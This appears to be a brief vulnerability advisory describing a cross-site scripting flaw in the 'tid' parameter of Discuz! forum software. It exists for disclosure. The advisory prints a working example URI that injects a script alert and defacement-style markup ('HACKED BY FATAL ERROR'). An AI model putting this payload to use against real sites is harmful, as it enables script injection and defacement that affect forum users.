|
|
Discuz! 'tid' Parameter Cross Site Scripting Vulnerability
Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal Error</h1></marquee> |
|
Privacy Statement |